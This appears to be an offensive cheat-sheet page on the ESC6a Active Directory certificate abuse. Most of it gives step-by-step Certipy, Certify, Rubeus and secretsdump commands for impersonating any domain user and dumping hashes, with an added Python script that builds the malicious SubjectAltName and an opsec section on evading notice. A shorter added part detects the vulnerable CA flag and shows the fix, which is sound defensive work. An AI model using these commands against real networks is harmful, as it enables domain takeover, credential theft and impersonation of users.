ADCSESC6a
ESC6a: EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on the CA and strong certificate mapping enforced on the DCs → enroll in any template that allows client authentication, supply an arbitrary SAN carrying the target's UPN plus the SID URL (tag:microsoft.com,2022-09-14:sid:<SID>), and authenticate as that principal. Any user can be impersonated, including across forest trusts.
Applies to: Users/Computers with Enroll rights on any Client Auth template → Enterprise CA with EDITF_ATTRIBUTESUBJECTALTNAME2 set (strong cert mapping enforced on DCs; SID URL required in the SAN)
Linux Abuse
certipy-ad
# Step 1: Confirm the CA flag and find templates you can enroll in
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Request a cert with the target's UPN and SID in the SAN.
# The SID is mandatory for ESC6a: DCs enforcing strong certificate mapping
# reject a UPN-only cert. The -sid option exists in recent Certipy releases
# (4.8 and later); if your build rejects it, use Certify on Windows (below).
# A UPN-only request only authenticates where strong mapping is not enforced,
# which is the ESC6b case, not this one.
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
    -ca '<ca>' -target <ca-host> -template '<template>' \
    -upn <target-user>@<domain> -sid '<target-sid>'
# Step 3: Authenticate with the PFX (writes <target-user>.ccache and prints the NT hash)
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>
# Step 4: Pass the hash (the impersonated account needs admin rights on the target)
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
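What the `-upn`/`-sid` (Certipy) or `/upn:`/`/sid:` (Certify) options boil down to is the SubjectAltName that the CA, thanks to EDITF_ATTRIBUTESUBJECTALTNAME2, accepts verbatim from the requester. The block below is an added example, not code from the page or from either tool: it builds that SAN in DER (UPN otherName plus the KB5014754 SID URL), decodes it back, and shows what a strong-mapping DC would extract. It is pure Python with no third-party packages; the UPN and SID values are constructed samples, and `sid_from_san` is a hypothetical helper that models the DC's check rather than any Microsoft API.

```python
"""
Added example (not from the page): build and decode the SubjectAltName an
ESC6a request must carry: the target's UPN as an otherName plus the SID URL
that DCs enforcing strong certificate mapping (KB5014754) look for.
Pure-Python DER, no third-party packages. Sample UPN/SID are constructed.
"""
from typing import List, Optional, Tuple

UPN_OID = "1.3.6.1.4.1.311.20.2.3"                   # szOID_NT_PRINCIPAL_NAME
SID_URL_PREFIX = "tag:microsoft.com,2022-09-14:sid:"  # strong-mapping SID URL form


def der_len(n: int) -> bytes:
    """DER length octets, short or long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der(tag: int, content: bytes) -> bytes:
    """One tag-length-value element."""
    return bytes([tag]) + der_len(len(content)) + content


def encode_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER TLV from dotted-decimal form (base-128 arcs)."""
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return der(0x06, bytes(out))


def sid_url(sid: str) -> str:
    """URL form of the SID that a strong-mapping DC accepts inside the SAN."""
    return SID_URL_PREFIX + sid


def build_san(upn: str, sid: Optional[str] = None) -> bytes:
    """SubjectAltName value: UPN otherName, optionally followed by the SID URL.
    Without the SID this is a UPN-only (ESC6b-style) SAN that a DC in
    Full Enforcement mode rejects."""
    # otherName [0] IMPLICIT { OID, [0] EXPLICIT UTF8String(upn) }
    names = [der(0xA0, encode_oid(UPN_OID) + der(0xA0, der(0x0C, upn.encode("utf-8"))))]
    if sid is not None:
        names.append(der(0x86, sid_url(sid).encode("ascii")))  # [6] IA5String URI
    return der(0x30, b"".join(names))


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, content, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def decode_oid(content: bytes) -> str:
    """Dotted-decimal OID from the content octets of an OID TLV."""
    arcs, val = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def parse_san(san: bytes) -> List[Tuple[str, str]]:
    """Decode a SAN into (kind, value) pairs: 'upn', 'uri', 'otherName' or 'other'."""
    tag, body, _ = _read_tlv(san, 0)
    if tag != 0x30:
        raise ValueError("SAN must be a SEQUENCE")
    out, pos = [], 0
    while pos < len(body):
        tag, content, pos = _read_tlv(body, pos)
        if tag == 0xA0:                                  # otherName
            _, oid_bytes, p = _read_tlv(content, 0)
            _, explicit, _ = _read_tlv(content, p)       # [0] EXPLICIT wrapper
            _, value, _ = _read_tlv(explicit, 0)         # the UTF8String itself
            kind = "upn" if decode_oid(oid_bytes) == UPN_OID else "otherName"
            out.append((kind, value.decode("utf-8")))
        elif tag == 0x86:                                # uniformResourceIdentifier
            out.append(("uri", content.decode("ascii")))
        else:
            out.append(("other", content.hex()))
    return out


def sid_from_san(entries: List[Tuple[str, str]]) -> Optional[str]:
    """Hypothetical model of the DC-side check: the SID found in the SAN URL, or None."""
    for kind, value in entries:
        if kind == "uri" and value.startswith(SID_URL_PREFIX):
            return value[len(SID_URL_PREFIX):]
    return None


if __name__ == "__main__":
    # Constructed sample target; substitute the real UPN and objectSid.
    san = build_san("administrator@corp.local", "S-1-5-21-1004336348-1177238915-682003330-500")
    for kind, value in parse_san(san):
        print(kind, value)
    print("strong mapping satisfied:", sid_from_san(parse_san(san)) is not None)
```

The same bytes are what Certify on Windows submits; the only difference between the two abuse paths is which tool wraps them into the CSR. If the SID entry is missing, a DC in Full Enforcement mode has nothing to map the certificate to and the `auth`/`asktgt` step fails with a certificate-mapping error.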
Windows Abuse
Certify.exe + Rubeus (supports SID URL)
# Step 1: Find vulnerable CA
Certify.exe find /vulnerable
# Step 2: Request a cert with the target's UPN and SID (the SID is required for strong cert mapping)
Certify.exe request /ca:<ca-host>\<ca> /template:<template> \
    /upn:<target-user>@<domain> \
    /sid:S-1-5-21-<domain-sid>-<target-rid>
# Certify prints the cert and key as PEM; convert to PFX, then base64 it for Rubeus:
# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Step 3: Request a TGT with the PFX and inject it into the current logon session
Rubeus.exe asktgt /user:<target-user> /domain:<domain> \
    /certificate:<pfx-base64> /ptt
# Verify
klist
Opsec
- CA flag: EDITF_ATTRIBUTESUBJECTALTNAME2 is visible via certutil -config "<ca-host>\<ca>" -getreg policy\EditFlags → defenders actively check this.
- All issued certs are logged in the CA's Issued Certificates store with the requesting principal's identity visible; the attacker-supplied SAN is part of the stored certificate.
- ESC6a differs from ESC6b in that strong cert mapping (KB5014754) is enforced → the SID must be embedded in the SAN for the cert to authenticate on patched DCs.
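The CA-flag check above is the one a defender (or an operator deciding whether ESC6 is even on the table) runs first. The block below is an added example, not code from the page: it parses the EditFlags DWORD out of certutil output and tests the 0x40000 bit. The two outputs are constructed samples shaped like `certutil -getreg policy\EditFlags` prints them; the CA name CORP-CA and the flag breakdown lines are illustrative.

```python
"""
Added example (not from the page): detect EDITF_ATTRIBUTESUBJECTALTNAME2 in
certutil -getreg policy\EditFlags output. Both sample outputs are constructed.
"""
import re

EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000   # documented flag value

# Constructed sample: default-looking EditFlags, flag NOT set (0x11014e).
SAFE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CORP-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:
  EditFlags REG_DWORD = 11014e (1114446)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

# Constructed sample: same CA with the ESC6 flag set (0x11014e | 0x40000 = 0x15014e).
VULNERABLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CORP-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:
  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

_EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)")


def parse_edit_flags(certutil_output: str) -> int:
    """Return the EditFlags DWORD. certutil prints it as hex, decimal in parentheses."""
    m = _EDITFLAGS_RE.search(certutil_output)
    if not m:
        raise ValueError("EditFlags REG_DWORD line not found in certutil output")
    return int(m.group(1), 16)


def san_attribute_enabled(certutil_output: str) -> bool:
    """True when the CA honours a requester-supplied SAN (ESC6 precondition)."""
    return bool(parse_edit_flags(certutil_output) & EDITF_ATTRIBUTESUBJECTALTNAME2)


def remediated_value(flags: int) -> int:
    """EditFlags with the SAN bit cleared, i.e. what the CA should show after the fix."""
    return flags & ~EDITF_ATTRIBUTESUBJECTALTNAME2


if __name__ == "__main__":
    for label, text in (("safe", SAFE_OUTPUT), ("vulnerable", VULNERABLE_OUTPUT)):
        flags = parse_edit_flags(text)
        print(f"{label}: EditFlags=0x{flags:x} SAN-from-request={san_attribute_enabled(text)}")
```

To clear the bit on a real CA: `certutil -config "<ca-host>\<ca>" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` followed by a restart of the CertSvc service; re-run the `-getreg` check afterwards and confirm the 0x40000 bit is gone.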